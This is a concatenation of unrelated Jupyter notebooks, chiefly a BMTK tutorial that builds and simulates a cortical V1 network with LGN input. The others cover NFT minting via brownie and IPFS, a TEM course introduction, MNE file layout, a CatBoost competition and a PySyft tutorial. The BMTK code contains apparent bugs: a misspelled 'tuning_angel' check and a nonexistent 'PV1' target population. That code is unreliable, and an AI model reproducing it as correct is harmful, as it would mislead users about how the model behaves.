model_template='ctdb:Biophys1.hoc',
model_processing='aibs_perisomatic',
dynamics_params='472363762_fit.json',
morphology='Scnn1a_473845048_m.swc'
)
net.add_nodes(
N=20, pop_name='PV',
positions=positions_columinar(N=20, center=[0, 50.0, 0], max_radius=30.0, height=100.0),
rotation_angle_yaxis=xiter_random(N=20, min_x=0.0, max_x=2*np.pi),
rotation_angle_zaxis=xiter_random(N=20, min_x=0.0, max_x=2*np.pi),
location='VisL4',
ei='i',
model_type='biophysical',
model_template='ctdb:Biophys1.hoc',
model_processing='aibs_perisomatic',
dynamics_params='472912177_fit.json',
morphology='Pvalb_470522102_m.swc'
)
# -
# To set the position and rotation of each cell, we use the built in function positions_columinar and xiter_random, which returns a list of values given the parameters. A user could set the values themselves using a list (or function that returns a list) of size N. The parameters like location, ei (potential), params_file, etc. are cell-type parameters, and will be used for all N cells of that type.
#
# The excitory cells are also given a tuning_angle parameter. An instrinsic "tuning angle" is a property found in some cells in the visual cortex. In this model, we will use this property to determine number of strenght of connections between subsets of cells by using custom functions. But in general most models will not have or use a tuning angle, but they may require some other parameter. In general, users can assign whatever custom parameters they want to cells and cell-types and use them as properties for creating connections and running simulations.
#
# Next we continue to create our point (integrate-and-fire) neurons. Notice they don't have properities like y/z rotation or morphology, as they wouldn't apply to point neurons.
# +
net.add_nodes(
N=200, pop_name='LIF_exc',
positions=positions_columinar(N=200, center=[0, 50.0, 0], min_radius=30.0, max_radius=60.0, height=100.0),
tuning_angle=np.linspace(start=0.0, stop=360.0, num=200, endpoint=False),
location='VisL4',
ei='e',
model_type='point_process',
model_template='nrn:IntFire1',
dynamics_params='IntFire1_exc_1.json'
)
net.add_nodes(
N=100, pop_name='LIF_inh',
positions=positions_columinar(N=100, center=[0, 50.0, 0], min_radius=30.0, max_radius=60.0, height=100.0),
location='VisL4',
ei='i',
model_type='point_process',
model_template='nrn:IntFire1',
dynamics_params='IntFire1_inh_1.json'
)
# -
# #### connections
#
# Now we want to create connections between the cells. Depending on the model type, and whether or not the presynpatic "source" cell is excitory or inhibitory, we will have different synpatic model and parameters. Using the source and target filter parameters, we can create different connection types.
#
# To determine excitory-to-excitory connection matrix we want to use distance and tuning_angle property. To do this we create a customized function "dist_tuning_connector"
# +
import random
import math
def dist_tuning_connector(source, target, d_weight_min, d_weight_max, d_max, t_weight_min, t_weight_max, nsyn_min,
nsyn_max):
if source['node_id'] == target['node_id']:
# Avoid self-connections.n_nodes
return None
r = np.linalg.norm(np.array(source['positions']) - np.array(target['positions']))
if r > d_max:
dw = 0.0
else:
t = r / d_max
dw = d_weight_max * (1.0 - t) + d_weight_min * t
if dw <= 0:
# drop the connection if the weight is too low
return None
# next create weights by orientation tuning [ aligned, misaligned ] --> [ 1, 0 ], Check that the orientation
# tuning property exists for both cells; otherwise, ignore the orientation tuning.
if 'tuning_angel' in source and 'tuning_angle' in target:
# 0-180 is the same as 180-360, so just modulo by 180
delta_tuning = math.fmod(abs(source['tuning_angle'] - target['tuning_angle']), 180.0)
# 90-180 needs to be flipped, then normalize to 0-1
delta_tuning = delta_tuning if delta_tuning < 90.0 else 180.0 - delta_tuning
t = delta_tuning / 90.0
tw = t_weight_max * (1.0 - t) + t_weight_min * t
else:
tw = dw
# drop the connection if the weight is too low
if tw <= 0:
return None
# filter out nodes by treating the weight as a probability of connection
if random.random() > tw:
return None
# Add the number of synapses for every connection.
# It is probably very useful to take this out into a separate function.
return random.randint(nsyn_min, nsyn_max)
# -
# This first two parameters of this function is "source" and "target" and are required for all custom connector functions. These are node objects which gives a representation of a single source and target cell, with properties that can be accessed like a python dictionary. When The Network Builder is creating the connection matrix, it will call this function for all possible source-target pairs. The user doesn't call this function directly.
#
# The remaining parameters are optional. Using these parameters, plus the distance and angles between source and target cells, this function determines the number of connections between each given source and target cell. If there are none you can return either None or 0.
#
# To create these connections we call add_edges method of the builder. We use the source and target parameter to filter out only excitory-to-excitory connections. We must also take into consideration the model type (biophysical or integrate-and-fire) of the target when setting parameters. We pass in the function throught the connection_rule parameter, and the function parameters (except source and target) through connection_params. (If our dist_tuning_connector function didn't have any parameters other than source and target, we could just not set connection_params).
# +
net.add_edges(
source={'ei': 'e'}, target={'pop_name': 'Scnn1a'},
connection_rule=dist_tuning_connector,
connection_params={'d_weight_min': 0.0, 'd_weight_max': 0.34, 'd_max': 300.0, 't_weight_min': 0.5,
't_weight_max': 1.0, 'nsyn_min': 3, 'nsyn_max': 7},
syn_weight=6.4e-05,
weight_function='gaussianLL',
weight_sigma=50.0,
distance_range=[30.0, 150.0],
target_sections=['basal', 'apical'],
delay=2.0,
dynamics_params='AMPA_ExcToExc.json',
model_template='exp2syn'
)
net.add_edges(
source={'ei': 'e'}, target={'pop_name': 'LIF_exc'},
connection_rule=dist_tuning_connector,
connection_params={'d_weight_min': 0.0, 'd_weight_max': 0.34, 'd_max': 300.0, 't_weight_min': 0.5,
't_weight_max': 1.0, 'nsyn_min': 3, 'nsyn_max': 7},
syn_weight=0.0019,
weight_function='gaussianLL',
weight_sigma=50.0,
delay=2.0,
dynamics_params='instanteneousExc.json',
model_template='exp2syn'
)
# -
# Similarly we create the other types of connections. But since either the source, target, or both cells will not have the tuning_angle parameter, we don't want to use dist_tuning_connector. Instead we can use the built-in distance_connector function which just creates connections determined by distance.
# +
from bmtk.builder.auxi.edge_connectors import distance_connector
### Generating I-to-I connections
net.add_edges(
source={'ei': 'i'}, target={'ei': 'i', 'model_type': 'biophysical'},
connection_rule=distance_connector,
connection_params={'d_weight_min': 0.0, 'd_weight_max': 1.0, 'd_max': 160.0, 'nsyn_min': 3, 'nsyn_max': 7},
syn_weight=0.0002,
weight_function='wmax',
distance_range=[0.0, 1e+20],
target_sections=['somatic', 'basal'],
delay=2.0,
dynamics_params='GABA_InhToInh.json',
model_template='exp2syn'
)
net.add_edges(
source={'ei': 'i'}, target={'ei': 'i', 'model_type': 'point_process'},
connection_rule=distance_connector,
connection_params={'d_weight_min': 0.0, 'd_weight_max': 1.0, 'd_max': 160.0, 'nsyn_min': 3, 'nsyn_max': 7},
syn_weight=0.00225,
weight_function='wmax',
delay=2.0,
dynamics_params='instanteneousInh.json',
model_template='exp2syn'
)
### Generating I-to-E connections
net.add_edges(
source={'ei': 'i'}, target={'ei': 'e', 'model_type': 'biophysical'},
connection_rule=distance_connector,
connection_params={'d_weight_min': 0.0, 'd_weight_max': 1.0, 'd_max': 160.0, 'nsyn_min': 3, 'nsyn_max': 7},
syn_weight=0.00018,
weight_function='wmax',
distance_range=[0.0, 50.0],
target_sections=['somatic', 'basal', 'apical'],
delay=2.0,
dynamics_params='GABA_InhToExc.json',
model_template='exp2syn'
)
net.add_edges(
source={'ei': 'i'}, target={'ei': 'e', 'model_type': 'point_process'},
connection_rule=distance_connector,
connection_params={'d_weight_min': 0.0, 'd_weight_max': 1.0, 'd_max': 160.0, 'nsyn_min': 3, 'nsyn_max': 7},
syn_weight=0.009,
weight_function='wmax',
delay=2.0,
dynamics_params='instanteneousInh.json',
model_template='exp2syn'
)
### Generating E-to-I connections
net.add_edges(
source={'ei': 'e'}, target={'pop_name': 'PV'},
connection_rule=distance_connector,
connection_params={'d_weight_min': 0.0, 'd_weight_max': 0.26, 'd_max': 300.0, 'nsyn_min': 3, 'nsyn_max': 7},
syn_weight=0.00035,
weight_function='wmax',
distance_range=[0.0, 1e+20],
target_sections=['somatic', 'basal'],
delay=2.0,
dynamics_params='AMPA_ExcToInh.json',
model_template='exp2syn'
)
net.add_edges(
source={'ei': 'e'}, target={'pop_name': 'LIF_inh'},
connection_rule=distance_connector,
connection_params={'d_weight_min': 0.0, 'd_weight_max': 0.26, 'd_max': 300.0, 'nsyn_min': 3, 'nsyn_max': 7},
syn_weight=0.0043,
weight_function='wmax',
delay=2.0,
dynamics_params='instanteneousExc.json',
model_template='exp2syn'
)
# -
# Finally we build the network (this may take a bit of time since it's essentially iterating over all 400x400 possible connection combinations), and save the nodes and edges.
net.build()
net.save_nodes(output_dir='sim_ch04/network')
net.save_edges(output_dir='sim_ch04/network')
# ### Building external network
#
# Next we want to create an external network consisting of virtual cells that form a feedforward network onto our V1, which will provide input during the simulation. We will call this LGN, since the LGN is the primary input the layer 4 cells of the V1 (if we wanted to we could also create multiple external networks and run simulations on any number of them).
#
# First we build our LGN nodes. Then we must import the V1 network nodes, and create connections between LGN --> V1.
# +
from bmtk.builder.networks import NetworkBuilder
lgn = NetworkBuilder('LGN')
lgn.add_nodes(
N=500,
pop_name='tON',
potential='exc',
model_type='virtual'
)
# -
# As before, we will use a customized function to determine the number of connections between each source and target pair, however this time our connection_rule is a bit different
#
# In the previous example, our connection_rule function's first two arguments were the presynaptic and postsynaptic cells, which allowed us to choose how many synaptic connections between the pairs existed based on individual properties:
# ```python
# def connection_fnc(source, target, ...):
# source['param'] # presynaptic cell params
# target['param'] # postsynaptic cell params
# ...
# return nsyns # number of connections between pair
# ```
#
# But for our LGN --> V1 connection, we do things a bit differently. We want to make sure that for every source cell, there are a limited number of presynaptic targets. This is a not really possible with a function that iterates on a one-to-one basis. So instead we have a connector function who's first parameter is a list of all N source cell, and the second parameter is a single target cell. We return an array of integers, size N; which each index representing the number of synaptics between sources and the target.
#
# To tell the builder to use this schema, we must set iterator='all_to_one' in the add_edges method. (By default this is set to 'one_to_one'. You can also use 'one_to_all' iterator which will pass in a single source and all possible targets).
# +
def select_source_cells(sources, target, nsources_min=10, nsources_max=30, nsyns_min=3, nsyns_max=12):
total_sources = len(sources)
nsources = np.random.randint(nsources_min, nsources_max)
selected_sources = np.random.choice(total_sources, nsources, replace=False)
syns = np.zeros(total_sources)
syns[selected_sources] = np.random.randint(nsyns_min, nsyns_max, size=nsources)
return syns
lgn.add_edges(
source=lgn.nodes(), target=net.nodes(pop_name='Scnn1a'),
iterator='all_to_one',
connection_rule=select_source_cells,
connection_params={'nsources_min': 10, 'nsources_max': 25},
syn_weight=4e-03,
weight_function='wmax',
distance_range=[0.0, 150.0],
target_sections=['basal', 'apical'],
delay=2.0,
dynamics_params='AMPA_ExcToExc.json',
model_template='exp2syn'
)
lgn.add_edges(
source=lgn.nodes(), target=net.nodes(pop_name='PV1'),
connection_rule=select_source_cells,
connection_params={'nsources_min': 15, 'nsources_max': 30},
iterator='all_to_one',
syn_weight=0.001,
weight_function='wmax',
distance_range=[0.0, 1.0e+20],
target_sections=['somatic', 'basal'],
delay=2.0,
dynamics_params='AMPA_ExcToInh.json',
model_template='exp2syn'
)
lgn.add_edges(
source=lgn.nodes(), target=net.nodes(pop_name='LIF_exc'),
connection_rule=select_source_cells,
connection_params={'nsources_min': 10, 'nsources_max': 25},
iterator='all_to_one',
syn_weight= 0.045,
weight_function='wmax',
delay=2.0,
dynamics_params='instanteneousExc.json',
model_template='exp2syn'
)
lgn.add_edges(
source=lgn.nodes(), target=net.nodes(pop_name='LIF_inh'),
connection_rule=select_source_cells,
connection_params={'nsources_min': 15, 'nsources_max': 30},
iterator='all_to_one',
syn_weight=0.02,
weight_function='wmax',
delay=2.0,
dynamics_params='instanteneousExc.json',
model_template='exp2syn'
)
lgn.build()
lgn.save_nodes(output_dir='sim_ch04/network')
lgn.save_edges(output_dir='sim_ch04/network')
# -
# ## 2. Setting up BioNet
#
# #### file structure.
#
# Before running a simulation, we will need to create the runtime environment, including parameter files, run-script and configuration files. You can copy the files from an existing simuatlion, execute the following command:
#
# ```bash
# $ python -m bmtk.utils.sim_setup \
# --report-vars v \
# --report-nodes 10,80 \
# --network sim_ch04/network \
# --dt 0.1 \
# --tstop 3000.0 \
# --include-examples \
# --compile-mechanisms \
# bionet sim_ch04
# ```
#
# $ python -m bmtk.utils.sim_setup --report-vars v --report-nodes 0,80,100,300 --network sim_ch04/network --dt 0.1 --tstop 3000.0 --include-examples --compile-mechanisms bionet sim_ch04
#
# or run it directly in python
# +
from bmtk.utils.sim_setup import build_env_bionet
build_env_bionet(
base_dir='sim_ch04',
config_file='config.json',
network_dir='sim_ch04/network',
tstop=3000.0, dt=0.1,
report_vars=['v'], # Record membrane potential (default soma)
include_examples=True, # Copies components files
compile_mechanisms=True # Will try to compile NEURON mechanisms
)
# -
# This will fill out the **sim_ch04** with all the files we need to get started to run the simulation. Of interest includes
#
# * **circuit_config.json** - A configuration file that contains the location of the network files we created above. Plus location of neuron and synpatic models, templates, morphologies and mechanisms required to build our instantiate individual cell models.
#
#
# * **simulation_config.json** - contains information about the simulation. Including initial conditions and run-time configuration (_run_ and _conditions_). In the _inputs_ section we define what external sources we will use to drive the network (in this case a current clamp). And in the _reports_ section we define the variables (soma membrane potential and calcium) that will be recorded during the simulation
#
#
# * **run_bionent.py** - A script for running our simulation. Usually this file doesn't need to be modified.
#
#
# * **components/biophysical_neuron_models/** - The parameter file for the cells we're modeling. Originally [downloaded from the Allen Cell Types Database](http://celltypes.brain-map.org/neuronal_model/download/482934212). These files were automatically copies over when we used the _include-examples_ directive. If using a differrent or extended set of cell models place them here
#
#
# * **components/biophysical_neuron_models/** - The morphology file for our cells. Originally [downloaded from the Allen Cell Types Database](http://celltypes.brain-map.org/neuronal_model/download/482934212) and copied over using the _include_examples_.
#
#
# * **components/point_neuron_models/** - The parameter file for our LIF_exc and LIF_inh cells.
#
#
# * **components/synaptic_models/** - Parameter files used to create different types of synapses.
#
# #### lgn input
#
# We need to provide our LGN external network cells with spike-trains so they can activate our recurrent network. Previously we showed how to do this by generating csv files. We can also use NWB files, which are a common format for saving electrophysiological data in neuroscience.
#
# We can use any NWB file generated experimentally or computationally, but for this example we will use a preexsting one. First download the file:
# ```bash
# $ wget https://github.com/AllenInstitute/bmtk/blob/develop/docs/examples/spikes_inputs/lgn_spikes.h5?raw=true -O lgn_spikes.h5
# ```
# or copy from [here](https://github.com/AllenInstitute/bmtk/tree/develop/docs/examples/spikes_inputs/lgn_spikes.nwb).
#
#
# Then we must edit the **simulation_config.json** file to tell the simulator to find the nwb file and which network to associate it with.
#
# ```json
# {
# "inputs": {
# "LGN_spikes": {
# "input_type": "spikes",
# "module": "sonata",
# "input_file": "$BASE_DIR/lgn_spikes.h5",
# "node_set": "LGN"
# }
# }
# }
# ```
#
# ## 3. Running the simulation
#
#
# We are close to running our simulation, however unlike in previous chapters we need a little more programming before we can begin.
#
# For most of the connections we added the parameter weight_function='wmax'. This is a built-in function that tells the simulator when creating a connection between two cells, just use the 'weight_max' value assigned to that given edge-type.
#
# However, when creating excitatory-to-excitatory connections we used weight_function='gaussianLL'. This is because we want to use the tuning_angle parameter, when avaiable, to determine the synaptic strength between two connections. First we create the function which takes in target, source and connection properties (which are just the edge-type and properties set in the add_edges method). Then we must register the function with the BioNet simulator:
# +
import math
from bmtk.simulator.bionet.pyfunction_cache import add_weight_function
def gaussianLL(edge_props, source, target):
src_tuning = source['tuning_angle']
tar_tuning = target['tuning_angle']
w0 = edge_props["syn_weight"]
sigma = edge_props["weight_sigma"]
delta_tuning = abs(abs(abs(180.0 - abs(float(tar_tuning) - float(src_tuning)) % 360.0) - 90.0) - 90.0)
return w0 * math.exp(-(delta_tuning / sigma) ** 2)
add_weight_function(gaussianLL)
# -
# The weights will be adjusted before each simulation, and the function can be changed between different runs.. Simply opening the edge_types.csv file with a text editor and altering the weight_function column allows users to take an existing network and readjust weights on-the-fly.
#
# Finally we are ready to run the simulation. Note that because this is a 400 cell simulation, this may be computationally intensive for some older computers and may take anywhere between a few minutes to half-an-hour to complete.
# +
from bmtk.simulator import bionet
conf = bionet.Config.from_json('sim_ch04/config.json')
conf.build_env()
net = bionet.BioNetwork.from_config(conf)
sim = bionet.BioSimulator.from_config(conf, network=net)
sim.run()
# -
# ## 4. Analyzing results
#
# Results of the simulation, as specified in the config, are saved into the output directory. Using the analyzer functions, we can do things like plot the raster plot
# +
from bmtk.analyzer.spike_trains import plot_raster, plot_rates_boxplot
plot_raster(config_file='sim_ch04/config.json', group_by='pop_name')
# -
# and the rates of each node
plot_rates_boxplot(config_file='sim_ch04/config.json', group_by='pop_name')
# In our config file we used the cell_vars and node_id_selections parameters to save the calcium influx and membrane potential of selected cells. We can also use the analyzer to display these traces:
# +
from bmtk.analyzer.compartment import plot_traces
_ = plot_traces(config_file='sim_ch04/config.json', group_by='pop_name', report_name='v_report')
# -
|
docs/tutorial/04_multi_pop.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# # Requirements
#
# ## Python
# +
import sys
python_version = (
f"{sys.version_info.major}."
f"{sys.version_info.minor}."
f"{sys.version_info.micro}"
)
print(f"Python version {python_version}")
# -
# Choose any following methods to install dependcies
# * poetry (recommend) <br/><br/>
# `poetry install` <br/><br/>
# * pip <br/><br/>
# `pip install -r requirements.txt`
#
# ## IPFS CLI
#
# Follow this URL https://docs.ipfs.io/install/command-line/#official-distributions
# # Import modules
# +
import brownie
from brownie import accounts, project, config, network
# Compile smart contracts
p = project.load('.', name="pynft")
p.load_config()
# -
# # Connect to chain
# +
import os
print("Available networks")
print(os.popen("brownie networks list").read())
# -
# ## Connect
NETWORK = "rinkeby"
# network.connect(NETWORK) # Main net fork
# network.connect(NETWORK) # Main net
network.connect(NETWORK) # Test net rinkeby
# # Account
# !brownie accounts list
# +
if NETWORK == "mainnet" and False:
from scripts.helpful_script import get_account
account = get_account()
else:
from brownie import accounts
accounts.load("eth-main") # Main net
account = accounts[0]
# -
print(account)
# # Dump variables
for key, value in p.__dict__.items():
print(key)
brownie.__dict__[key] = p.__dict__[key]
# # Deploy contracts
# +
from brownie import PYNFT
pynft = PYNFT.deploy({"from": account})
# -
# # Upload file to IPFS
# ## Assets
# +
prefix = "assets/"
def upload_to_ipfs(filepath: str) -> str:
return os.popen(f"ipfs add -q {filepath}").read().strip()
def is_an_image(filename: str):
"""
Description:
Check if a file is an image
paramgs:
filename:
(str) filename, should be with its extension
returns:
(str) qid of ipfs
"""
for extention in [".png", "jpg"]:
if filename.endswith(extention):
return True
return False
def set_ipfs_share_link(prefix: str, asset: str) -> str:
"""
description:
Run IPFS upload process and return share link URL
params:
prefix:
(str) Local prefix file
asset:
(str) Filename
returns:
(str) share link url
"""
IPFS_PREFIX = "https://ipfs.io/ipfs"
qid = upload_to_ipfs(f"{prefix}{asset}".replace(" ", "\ "))
asset = asset.replace(" ", "-")
return f"{IPFS_PREFIX}/{qid}?filename={asset}"
class Attribute:
pass
attribute = Attribute()
for asset in os.listdir(prefix):
if asset.startswith(".") or asset == "metadata.json":
# Skip
continue
ipfs_share_link = set_ipfs_share_link(prefix, asset)
if is_an_image(asset):
setattr(attribute, "image_url", ipfs_share_link)
else:
setattr(attribute, "external_url", ipfs_share_link)
print(ipfs_share_link)
# -
# # Set up metadata
# ## Render metadata from template
metadata = {
"description": """It was in 2015, I was an engineer intern.
I was assigned to code in Python for satellite signal processing.
At that time, I had no experience with it, but I had completed C#, C and Matlab courses.
It inspired me to transfer from electrical to software engineer career path.
Now, I partially succeed in software engineering, machine learning and A.I implementation.
This NFT determines where I started.
Moreover, I minting this NFT with my Solidity code I created by myself.
No, it's not my first Solidity project :D
But it's my first Solidity project deployed in `production`.
Which means this is the starting point for my smart contract development.
Smart contract repository is located in https://github.com/batprem/pynft
""",
"external_url": attribute.external_url,
"image": attribute.image_url,
"name": "My first Python code",
"attributes": [],
}
# ## Save metadata into JSON
# +
import json
metadata_filename = "metadata.json"
with open(f"assets/{metadata_filename}", "w") as json_file:
json.dump(metadata, json_file)
metadata_share_link = set_ipfs_share_link(prefix, metadata_filename)
# -
# # Assign to smart contract
# ## Mint
PYNFT[-1].createCollectable({"from": account}).wait(1)
# ## Set URI
PYNFT[-1].setBaseURI(metadata_share_link, {"from": account}).wait(1)
PYNFT[-1].tokenURI(0)
PYNFT[-1].tokenCounter()
# ## Reference
#
# * https://www.youtube.com/watch?v=M576WGiDBdQ&t=8373s
|
MintNFT.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# <font size = "5"> **Chapter 1: [Introduction](CH1_00-Introduction.ipynb)** </font>
#
#
# <hr style="height:1px;border-top:4px solid #FF8200" />
#
# # Introduction to this Jupyter Lecture Notebook-Book
#
#
# [Download](https://raw.githubusercontent.com/gduscher/MSE672-Introduction-to-TEM//main/Introduction/CH1_00-Introduction.ipynb)
#
# [](
# https://colab.research.google.com/github/gduscher/MSE672-Introduction-to-TEM/blob/main/Introduction/CH1_00-Introduction.ipynb)
#
#
# part of
#
# <font size = "5"> **[MSE672: Introduction to Transmission Electron Microscopy](../_MSE672_Intro_TEM.ipynb)**</font>
#
#
# by <NAME>, Spring 2021
#
# Microscopy Facilities<br>
# Joint Institute of Advanced Materials<br>
# Materials Science & Engineering<br>
# The University of Tennessee, Knoxville
#
# Background and methods to analysis and quantification of data acquired with transmission electron microscopes.
# ## Introduction
#
# This notebook-book, -course, -series, or whatever you want ot call it is a collection fo jupyter notebooks to analyse the various data which can be acquired with a transmission electron microscope (TEM).
#
# First of all, **you do not need to program anything**, however, you will have to change the values of input parameters in the code cells. Of course, you are encouraged to modify the code in order to explore the data analysis methods, what can go wrong?
#
# The advantage of jupyter notebooks is that it is a combination fo the usual textbook and the data analysis software. The intent of the book is not to make a cool graphic user interface with a fast data analysis but to make it obvious what numerical and physical means are used to extract quantitative values from these data.
#
#
# ## Content
# This (note-) book is divided in the following sections:
#
# * **Chapter 1: [Introduction](CH1_00-Introduction.ipynb)**
# * [Python as it is used here](CH1_01-Introduction_Python.ipynb)
# * [Installation and Prerequesites](CH1_02-Prerequisites.ipynb)
# * [Matplotlib and Numpy for Micrographs](CH1_03-Data_Representation.ipynb)
# * [Open a (DM) file ](CH1_04-Open_Files.ipynb)
# * *Course Material*
# * [Course Organization](CH1_05-Course_Organization.ipynb)
# * [Overview](CH1_06-Overview.ipynb)
# * [Electron-Optics](CH1_07-Electron-Optics.ipynb)
#
#
#
# ## Navigation:
# - **[Front](../_MSE672_Intro_TEM.ipynb)**
#
|
Introduction/CH1_00-Introduction.ipynb
|
/ ---
/ jupyter:
/ jupytext:
/ text_representation:
/ extension: .q
/ format_name: light
/ format_version: '1.5'
/ jupytext_version: 1.14.4
/ ---
/ + cell_id="00000-fc462851-8f88-4427-9735-14dacc7c4189" execution_millis=1 execution_start=1604624288126 output_cleared=false source_hash="57592999" tags=[] language="bash"
/ python --version
/ + cell_id="00001-221ee7c9-8b8b-48ed-996a-a46aa551e77e" tags=[]
|
deepnote.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# # Organizing your files for group analysis
#
# `
# Authors: <NAME> <<EMAIL>>
# `
#
# License: BSD (3-clause)
# This notebook shows an example of file organization for a group study.
#
# MNE uses the FreeSurfer philosophy which is to have a folder per subject.
#
# Here is an example:
#
# ```
#
# ├── MEG
# │ └── sub01
# │ └── sub01_run1_raw.fif
# │ └── sub01_run2_raw.fif
# │ └── ...
# │ └── sub01-epo.fif
# │ └── sub01-ave.fif
# │ └── sub01-trans.fif
# │ └── sub01-...-fwd.fif
# │ └── sub01-...-src.fif
# │ └── sub01-...-inv.fif
# │ └── sub02
# │ └── ...
# │ └── sub03
# │ └── ...
# │ └── ...
# │
# └── subjects
# │ ├── fsaverage
# │ └── sub01
# │ └── mri
# │ └── surf
# │ └── label
# │ └── ...
# │ └── sub02
# │ └── ...
# │ └── sub03
# │ └── ...
# └── scripts
# ├── 01-run_anatomy.ipy
# ├── 02-run_filtering.ipy
# ├── 03-run_extract_events.py
# ├── 04-make_epochs.py
# ├── 05-make_forward.py
# ├── 06-make_inverse.py
# ├── ...
# ├── 99-make_reports.ipy
# ├── config.py
# ```
#
# The MEG folder contains all the functional data (MEG/EEG) and the subjects folder contains all the anatomical files obtained via FreeSurfer.
|
2016_05_Halifax/Day3/Group_analysis.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import pandas as pd
import numpy as np
from catboost import CatBoostClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import f1_score
# -
# Сначала я решил попробовать сделать случайный лес.
train = pd.read_csv('train.csv', sep='\t')
test = pd.read_csv('test.csv')
X_train = train.iloc[:, 2: -1]
y_train = train.iloc[:, -1]
X_test = test.iloc[:, 4:]
X_train.dropna(axis=1, how='any', inplace=True)
columns = []
for column in X_train.columns:
if len(np.unique(X_train[column])) < 1000:
columns += [column]
X_train.columns = columns
y_train.columns = columns
rfc = RandomForestClassifier(verbose=True, random_state=42)
rfc.fit(X_train, y_train)
y_pred_new = rfc.predict(test[columns])
y_pred_csv_new = pd.DataFrame()
y_pred_csv_new["Id"] = test["Id"]
y_pred_csv_new["mg"] = pd.DataFrame(y_pred_new)
y_pred_csv_new = y_pred_csv_new.iloc[:, 1:]
y_pred_csv_new.to_csv('solution_new_new_new.csv')
# Отправил в контест - вышло неплохо.
# Все вокруг говорили "бустинг, бустинг" - ну я сделал.
model = CatBoostClassifier(verbose=True, class_weights=[1, 1.5], random_seed=42)
fit_model = model.fit(X_train, y_train)
y_pred = fit_model.predict(test[columns])
len(np.where(y_pred==1)[0])
y_pred_csv = pd.DataFrame()
y_pred_csv["Id"] = test["Id"]
y_pred_csv["mg"] = pd.DataFrame(y_pred)
y_pred_csv.to_csv('solution_catbost.csv', index=None)
# Отправил - вышло лучше.
# Основная проблема - несбалансирвоанность классов. Для этого я расставил им веса. Пропорцию выбирал по количеству нулей и единиц в обучающей выборке.
train = pd.read_csv('train.csv', sep='\t')
train.dropna(axis=1, how='any', inplace=True)
X_train = train.iloc[:, 2: -1].iloc[:-int(len(train)*0.2),]
y_train = train.iloc[:, -1].iloc[:-int(len(train)*0.2),]
X_test = train.iloc[:, 2: -1].iloc[-int(len(train)*0.2):,]
y_test = train.iloc[:, -1].iloc[-int(len(train)*0.2):,]
model = CatBoostClassifier(class_weights=[1, 6], random_seed=42)
fit_model = model.fit(X_train, y_train)
y_pred = fit_model.predict(X_test)
f1_score(y_pred, y_test)
# Применил для обучающей выборки.
train = pd.read_csv('train.csv', sep='\t')
test = pd.read_csv('test.csv')
X_train = train.iloc[:, 2: -1]
y_train = train.iloc[:, -1]
X_test = test.iloc[:, 4:]
X_train.dropna(axis=1, how='any', inplace=True)
columns = []
for column in X_train.columns:
if len(np.unique(X_train[column])) < 1000:
columns += [column]
X_train.columns = columns
y_train.columns = columns
model = CatBoostClassifier(class_weights=[1, 6], random_seed=42)
fit_model = model.fit(X_train, y_train)
y_pred = fit_model.predict(X_test)
y_pred = y_pred.astype(int)
y_pred_csv = pd.DataFrame()
y_pred_csv["Id"] = test["Id"]
y_pred_csv["mg"] = pd.DataFrame(y_pred)
y_pred_csv.to_csv('solution_catboost_1.csv', index=None)
# Ну вот, все успешно.
train = pd.read_csv('train.csv', sep='\t')
X_train = train.iloc[:, 2: -1].iloc[:-int(len(train)*0.2),]
y_train = train.iloc[:, -1].iloc[:-int(len(train)*0.2),]
X_test = train.iloc[:, 2: -1].iloc[-int(len(train)*0.2):,]
y_test = train.iloc[:, -1].iloc[-int(len(train)*0.2):,]
X_train.dropna(axis=1, how='any', inplace=True)
columns = []
for column in X_train.columns:
if len(np.unique(X_train[column])) < 1000:
columns += [column]
X_train.columns = columns
y_train.columns = columns
weights = np.arange(5.5, 6.5, 0.05)
# +
w = 0
maximum = 0
y = np.array([])
for weight in weights:
model = CatBoostClassifier(class_weights=[1, weight], random_seed=42, verbose=False)
fit_model = model.fit(X_train, y_train)
y_pred = fit_model.predict(X_test)
score = f1_score(y_pred, y_test)
if score > maximum:
maximum = score
w = weight
y = y_pred
print("score", maximum)
print("weight", w)
print(y_pred)
# -
train = pd.read_csv('train.csv', sep='\t')
test = pd.read_csv('test.csv')
X_train = train.iloc[:, 2: -1]
y_train = train.iloc[:, -1]
X_test = test.iloc[:, 4:]
X_train.dropna(axis=1, how='any', inplace=True)
columns = []
for column in X_train.columns:
if len(np.unique(X_train[column])) < 1000:
columns += [column]
X_train.columns = columns
y_train.columns = columns
model = CatBoostClassifier(class_weights=[1, 6.24], random_seed=42, verbose=False)
fit_model = model.fit(X_train, y_train)
y_pred = fit_model.predict(X_test)
y_pred = y_pred.astype(int)
y_pred_csv = pd.DataFrame()
y_pred_csv["Id"] = test["Id"]
y_pred_csv["mg"] = pd.DataFrame(y_pred)
y_pred_csv.to_csv('solution_catboost_2.csv', index=None)
# Ну вот это не зашло. Оставил прежнее.
|
hw4/main.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + tags=["parameters"]
epochs = 50
# + [markdown] lang="hi"
# # भाग 7 - फेडरेटेड डेटासेटसह(Federated Dataset) फेडरेटेड लर्निंग(Federated Learning)
#
#
# येथे आम्ही फेडरेटेड डेटासेट `Federated Dataset` वापरण्यासाठी नवीन साधन सादर करतो. आम्ही फेडरेटेड डेटासेट क्लास तयार केला आहे जो PyTorch डेटासेट Dataset क्लास सारखा वापरला जावा असा आहे आणि तो फेडरेटेड डेटा लोडरला `FederatedDataLoader` देण्यात आला आहे ज्याची फेडरेटेड पद्धतीने पुनरावृत्ती होईल.
#
#
# लेखक:
# - <NAME> - Twitter: [@iamtrask](https://twitter.com/iamtrask)
